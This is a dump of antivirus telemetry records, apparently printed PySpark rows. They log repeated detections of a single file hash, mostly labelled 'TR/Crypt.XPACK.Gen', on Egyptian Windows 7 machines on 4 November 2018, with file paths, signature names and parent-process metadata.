  Row(detection=Row(filename='tmp002909ec', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002909ec', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:37:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf3e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf3e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297892', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297892', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:50:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e5c1', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e5c1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:59:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291e03', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291e03', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091658-1a42e627', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091658-1A42E627', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c27e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c27e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:29:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c2d3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c2d3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:29:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf61', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf61', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029403d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029403d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:34:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091517-0cdd35e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091517-0CDD35E6', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002931b6', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002931b6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:23:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023933a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023933a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:38:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b533', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b533', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023fa15', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023fa15', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:20:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029024c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029024c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:28:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293137', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293137', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:23:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295830', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295830', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:03:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237c57', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237c57', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:12:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b40', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b40', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:58:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b5d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b5d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:58:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237f7b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237f7b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:16:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237fea', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237fea', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:16:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cf8a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cf8a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:43:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237d9f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237d9f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:14:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f2f0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f2f0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029755a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029755a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:46:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aee8', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aee8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295f87', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295f87', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:14:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dca0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dca0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dd20', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dd20', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b5ac', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b5ac', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:15:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002955d2', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002955d2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:00:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aeee', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aeee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:08:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dd5c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dd5c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002965f9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002965f9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:24:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294ff4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294ff4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:54:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291894', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291894', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:55:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f48a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f48a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:16:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f476', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f476', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:16:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002382a2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002382a2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:19:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002971c5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002971c5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a45a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a45a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:56:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290429', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290429', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:30:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239448', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239448', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:39:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c7aa', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c7aa', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:34:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296753', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296753', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:26:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238706', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238706', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:24:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c756', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c756', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:34:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023eb83', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023eb83', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029195c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029195c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:55:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290439', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290439', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:30:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290eb3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290eb3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:43:06Z'), dt=datetime.date(2018, 11, 4)),
